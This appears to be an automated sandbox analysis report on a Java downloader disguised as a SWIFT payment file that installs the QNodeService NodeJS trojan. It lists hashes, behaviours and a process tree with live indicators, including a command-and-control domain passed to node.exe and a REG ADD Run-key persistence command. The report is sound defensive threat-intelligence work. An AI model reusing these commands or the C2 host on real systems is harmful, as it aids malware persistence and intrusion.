Analysis
- max time kernel: 147s
- max time network: 122s
- platform: windows10_x64
- resource: win10
- submitted: 26/10/2020, 14:50
Static task: static1

Behavioral task: behavioral1
- Sample: SWIFT MT103 65800 .jar
- Resource: win7

Behavioral task: behavioral2
- Sample: SWIFT MT103 65800 .jar
- Resource: win10
General
- Target: SWIFT MT103 65800 .jar
- Size: 74KB
- MD5: 1c42b39fa5ff0b4d50d099a5e24c8d1b
- SHA1: 8cd53e0dad4fb4d14f9c7961e60c4f22950d4dd2
- SHA256: e0d72ff290c85484632f91a9ae7de44f3b72e0f4c77bded1b2026f51c2d22f97
- SHA512: 3c2bf03e0351dfcc0d683dd698005d2b0e46d7f34dcb179180c3783a0a831c6372e10d8f50b76352d586fbe057fcd82e4b1eaeb73524751175e484f5f358ca54
Malware Config

Signatures

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.

Executes dropped EXE (3 IoCs)
  pid  | Process
  1240 | node.exe
  3352 | node.exe
  2672 | node.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\d2a1ce22-cdce-48c4-ae38-31aa0b248d26 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe

JavaScript code in executable (3 IoCs)
  resource | yara_rule
  behavioral2/files/0x000100000001ab50-168.dat | js
  behavioral2/files/0x000100000001ab50-171.dat | js
  behavioral2/files/0x000100000001ab50-175.dat | js

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  39   | wtfismyip.com
  40   | wtfismyip.com

Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid  | Process
  1240 | node.exe (4 entries)
  3352 | node.exe (4 entries)
  2672 | node.exe (10 entries)

Suspicious use of WriteProcessMemory (12 IoCs; each row listed twice in the report)
  description | pid | Process | procid_target
  PID 3868 wrote to memory of 2668 | 3868 | java.exe | 75
  PID 2668 wrote to memory of 1240 | 2668 | javaw.exe | 79
  PID 1240 wrote to memory of 3352 | 1240 | node.exe | 81
  PID 3352 wrote to memory of 2672 | 3352 | node.exe | 82
  PID 2672 wrote to memory of 2308 | 2672 | node.exe | 84
  PID 2308 wrote to memory of 1972 | 2308 | cmd.exe | 85
Processes (process tree; indentation shows parent/child depth)

[1] C:\ProgramData\Oracle\Java\javapath\java.exe (PID:3868)
    Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\SWIFT MT103 65800 .jar"
    - Suspicious use of WriteProcessMemory

  [2] C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe (PID:2668)
      Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\a142b49e.tmp
      - Suspicious use of WriteProcessMemory

    [3] C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID:1240)
        Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain acmehydraeulic.ddns.net --hub-domain localhost
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

      [4] C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID:3352)
          Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Azpb9E\boot.js --hub-domain acmehydraeulic.ddns.net --hub-domain localhost
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory

        [5] C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID:2672)
            Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Azpb9E\boot.js --hub-domain acmehydraeulic.ddns.net --hub-domain localhost
            - Executes dropped EXE
            - Checks processor information in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\cmd.exe (PID:2308)
              Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d2a1ce22-cdce-48c4-ae38-31aa0b248d26" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\system32\reg.exe (PID:1972)
                Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d2a1ce22-cdce-48c4-ae38-31aa0b248d26" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                - Adds Run key to start application